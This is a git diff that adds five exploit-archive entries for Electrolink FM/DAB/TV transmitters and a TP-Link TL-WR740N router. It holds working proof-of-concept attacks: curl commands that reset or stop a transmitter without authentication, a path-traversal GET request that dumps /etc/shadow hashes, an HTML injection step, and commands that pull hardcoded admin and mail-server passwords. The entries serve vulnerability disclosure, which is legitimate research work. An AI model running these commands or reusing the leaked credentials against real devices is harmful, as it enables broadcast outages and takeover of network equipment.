Merge remote-tracking branch 'upstream/main'

exploits/hardware/dos/51774.txt

@@ -0,0 +1,82 @@
+Electrolink FM/DAB/TV Transmitter Unauthenticated Remote DoS
+
+
+Vendor: Electrolink s.r.l.
+Product web page: https://www.electrolink.com
+Affected version: 10W, 100W, 250W, Compact DAB Transmitter
+                  500W, 1kW, 2kW Medium DAB Transmitter
+                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
+                  100W, 500W, 1kW, 2kW Compact FM Transmitter
+                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
+                  15W - 40kW Digital FM Transmitter
+                  BI, BIII VHF TV Transmitter
+                  10W - 5kW UHF TV Transmitter
+                  Web version: 01.09, 01.08, 01.07
+                  Display version: 1.4, 1.2
+                  Control unit version: 01.06, 01.04, 01.03
+                  Firmware version: 2.1
+
+Summary: Since 1990 Electrolink has been dealing with design and
+manufacturing of advanced technologies for radio and television
+broadcasting. The most comprehensive products range includes: FM
+Transmitters, DAB Transmitters, TV Transmitters for analogue and
+digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
+DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
+switches, Manual patch panels, RF power meters, Rigid line and
+accessories. A professional solution that meets broadcasters needs
+from small community television or radio to big government networks.
+
+Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
+touch-screen display and in-built state of the art DAB modulator,
+EDI input and GPS receiver. All transmitters are equipped with a
+state-of-the art DAB modulator with excellent performances,
+self-protected and self-controlled amplifiers ensure trouble-free
+non-stop operation.
+
+100W, 500W, 1kW and 2kW power range available on compact 2U and
+3U 19" frame. Built-in stereo coder, touch screen display and
+efficient low noise air cooling system. Available models: 3kW,
+5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
+with fully broadband solid state amplifiers and an efficient
+low-noise air cooling system.
+
+FM digital modulator with excellent specifications, built-in
+stereo and RDS coder. Digital deviation limiter together with
+ASI and SDI inputs are available. These transmitters are ready
+for ISOFREQUENCY networks.
+
+Available for VHF BI and VHF BIII operation with robust desing
+and user-friendly local and remote control. Multi-standard UHF
+TV transmitters from 10W up to 5kW with efficient low noise air
+cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
+and ISDB-Tb available.
+
+Desc: The transmitter is suffering from a Denial of Service (DoS)
+scenario. An unauthenticated attacker can reset the board as well
+as stop the transmitter operations by sending one GET request to
+the command.cgi gateway.
+
+Tested on: Mbedthis-Appweb/12.5.0
+           Mbedthis-Appweb/12.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research & Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2023-5795
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5795.php
+
+
+30.06.2023
+
+--
+
+
+C:\>curl -s http://192.168.150.77:8888/command.cgi?web=r (reset board)
+Success! OK
+C:\>curl -s http://192.168.150.77:8888/command.cgi?web=K (stop)
+Success! OK
+C:\>curl -s http://192.168.150.77:8888/command.cgi?web=J (start)
+Success! OK

exploits/hardware/webapps/51768.txt

@@ -0,0 +1,56 @@
+# Exploit Title: TP-Link TL-WR740N UnAuthenticated Directory Transversal
+# Date: 25/9/2023
+# Exploit Author: Syed Affan Ahmed (ZEROXINN)
+# Vendor Homepage: http://www.tp-link.com
+# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
+# Tested on: TP-Link TL-WR740N
+
+---------------------------POC---------------------------
+
+Request
+-------
+
+GET /help/../../../etc/shadow HTTP/1.1
+Host: 192.168.0.1:8082
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: ipaddr=192.168.0.100; mLangage=žée; exception=4
+Connection: close
+
+Response
+--------
+
+HTTP/1.1 200 OK
+Server: Router Webserver
+Connection: close
+WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"
+Content-Type: text/html
+
+<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
+<HTML>
+<HEAD><TITLE>TL-WR740N</TITLE>
+<META http-equiv=Pragma content=no-cache>
+<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
+<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
+<SCRIPT language="javascript" type="text/javascript"><!--
+if(window.parent == window){window.location.href="http://192.168.0.1";}
+function Click(){ return false;}
+document.oncontextmenu=Click;
+function doPrev(){history.go(-1);}
+//--></SCRIPT>
+root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
+Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
+bin::10933:0:99999:7:::
+daemon::10933:0:99999:7:::
+adm::10933:0:99999:7:::
+lp:*:10933:0:99999:7:::
+sync:*:10933:0:99999:7:::
+shutdown:*:10933:0:99999:7:::
+halt:*:10933:0:99999:7:::
+uucp:*:10933:0:99999:7:::
+operator:*:10933:0:99999:7:::
+nobody::10933:0:99999:7:::
+ap71::10933:0:99999:7:::

exploits/hardware/webapps/51769.txt

@@ -0,0 +1,18 @@
+# Exploit Title: TP-LINK TL-WR740N - Multiple HTML Injection Vulnerabilities
+# Date: 25/9/2023
+# Exploit Author: Shujaat Amin (ZEROXINN)
+# Vendor Homepage: http://www.tp-link.com
+# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
+# Tested on: Windows 10
+
+---------------------------POC-----------------------------
+
+1) Go to your routers IP (192.168.0.1)
+
+2) Go to Access control --> Target,rule
+
+3) Click on add new
+
+5) Type <h1>Hello<h1> in Target Description box
+
+6) Click on Save, and now you can see html injection on the webpage

exploits/hardware/webapps/51770.txt

@@ -0,0 +1,83 @@
+Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials Disclosure
+
+
+Vendor: Electrolink s.r.l.
+Product web page: https://www.electrolink.com
+Affected version: 10W, 100W, 250W, Compact DAB Transmitter
+                  500W, 1kW, 2kW Medium DAB Transmitter
+                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
+                  100W, 500W, 1kW, 2kW Compact FM Transmitter
+                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
+                  15W - 40kW Digital FM Transmitter
+                  BI, BIII VHF TV Transmitter
+                  10W - 5kW UHF TV Transmitter
+                  Web version: 01.09, 01.08, 01.07
+                  Display version: 1.4, 1.2
+                  Control unit version: 01.06, 01.04, 01.03
+                  Firmware version: 2.1
+
+Summary: Since 1990 Electrolink has been dealing with design and
+manufacturing of advanced technologies for radio and television
+broadcasting. The most comprehensive products range includes: FM
+Transmitters, DAB Transmitters, TV Transmitters for analogue and
+digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
+DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
+switches, Manual patch panels, RF power meters, Rigid line and
+accessories. A professional solution that meets broadcasters needs
+from small community television or radio to big government networks.
+
+Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
+touch-screen display and in-built state of the art DAB modulator,
+EDI input and GPS receiver. All transmitters are equipped with a
+state-of-the art DAB modulator with excellent performances,
+self-protected and self-controlled amplifiers ensure trouble-free
+non-stop operation.
+
+100W, 500W, 1kW and 2kW power range available on compact 2U and
+3U 19" frame. Built-in stereo coder, touch screen display and
+efficient low noise air cooling system. Available models: 3kW,
+5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
+with fully broadband solid state amplifiers and an efficient
+low-noise air cooling system.
+
+FM digital modulator with excellent specifications, built-in
+stereo and RDS coder. Digital deviation limiter together with
+ASI and SDI inputs are available. These transmitters are ready
+for ISOFREQUENCY networks.
+
+Available for VHF BI and VHF BIII operation with robust desing
+and user-friendly local and remote control. Multi-standard UHF
+TV transmitters from 10W up to 5kW with efficient low noise air
+cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
+and ISDB-Tb available.
+
+Desc: The device is vulnerable to a disclosure of clear-text
+credentials in login.htm and mail.htm that can allow security
+bypass and system access.
+
+Tested on: Mbedthis-Appweb/12.5.0
+           Mbedthis-Appweb/12.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research & Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2023-XXXX
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-xxxx.php
+
+
+30.06.2023
+
+--
+
+
+C:\>curl -s "http://192.168.150.77:8888/login.htm" | findstr /spina:d "passw"
+55:<td class=cd31>Admin password</td>
+56:<td class=cd32><input type=password name=adminpassword value="cozzir" tabindex=2 style="width: 95%" maxlength="30"/></td>
+63:<td class=cd31>Guest password</td>
+64:<td class=cd32><input type=password name=guestpassword value="guest" tabindex=4 style="width: 95%" maxlength="30"/></td>
+C:\>curl -s http://192.168.150.77:8888/mail.htm | findstr /spina:d "passw"
+93:<td class=cd31>Server password</td>
+94:<td class=cd32><input type=password name=password value="t00tw00t" tabindex=4 style="width: 95%" maxlength="40"/></td>

exploits/hardware/webapps/51771.txt

@@ -0,0 +1,90 @@
+Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure
+
+
+Vendor: Electrolink s.r.l.
+Product web page: https://www.electrolink.com
+Affected version: 10W, 100W, 250W, Compact DAB Transmitter
+                  500W, 1kW, 2kW Medium DAB Transmitter
+                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
+                  100W, 500W, 1kW, 2kW Compact FM Transmitter
+                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
+                  15W - 40kW Digital FM Transmitter
+                  BI, BIII VHF TV Transmitter
+                  10W - 5kW UHF TV Transmitter
+                  Web version: 01.09, 01.08, 01.07
+                  Display version: 1.4, 1.2
+                  Control unit version: 01.06, 01.04, 01.03
+                  Firmware version: 2.1
+
+Summary: Since 1990 Electrolink has been dealing with design and
+manufacturing of advanced technologies for radio and television
+broadcasting. The most comprehensive products range includes: FM
+Transmitters, DAB Transmitters, TV Transmitters for analogue and
+digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
+DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
+switches, Manual patch panels, RF power meters, Rigid line and
+accessories. A professional solution that meets broadcasters needs
+from small community television or radio to big government networks.
+
+Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
+touch-screen display and in-built state of the art DAB modulator,
+EDI input and GPS receiver. All transmitters are equipped with a
+state-of-the art DAB modulator with excellent performances,
+self-protected and self-controlled amplifiers ensure trouble-free
+non-stop operation.
+
+100W, 500W, 1kW and 2kW power range available on compact 2U and
+3U 19" frame. Built-in stereo coder, touch screen display and
+efficient low noise air cooling system. Available models: 3kW,
+5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
+with fully broadband solid state amplifiers and an efficient
+low-noise air cooling system.
+
+FM digital modulator with excellent specifications, built-in
+stereo and RDS coder. Digital deviation limiter together with
+ASI and SDI inputs are available. These transmitters are ready
+for ISOFREQUENCY networks.
+
+Available for VHF BI and VHF BIII operation with robust desing
+and user-friendly local and remote control. Multi-standard UHF
+TV transmitters from 10W up to 5kW with efficient low noise air
+cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
+and ISDB-Tb available.
+
+Desc: The device is vulnerable to a disclosure of clear-text
+credentials in controlloLogin.js that can allow security
+bypass and system access.
+
+Tested on: Mbedthis-Appweb/12.5.0
+           Mbedthis-Appweb/12.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research & Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2023-5790
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php
+
+
+30.06.2023
+
+--
+
+
+C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js"
+function verifica() {
+        var user = document.getElementById('user').value;
+        var password = document.getElementById('password').value;
+
+        //alert(user);
+
+        if(user=='admin' && password=='cozzir'){
+                SetCookie('Login','OK',exp);
+                window.location.replace("FrameSetCore.html");
+        }else{
+                SetCookie('Login','NO',exp);
+                window.location.replace("login.html");
+        }
+}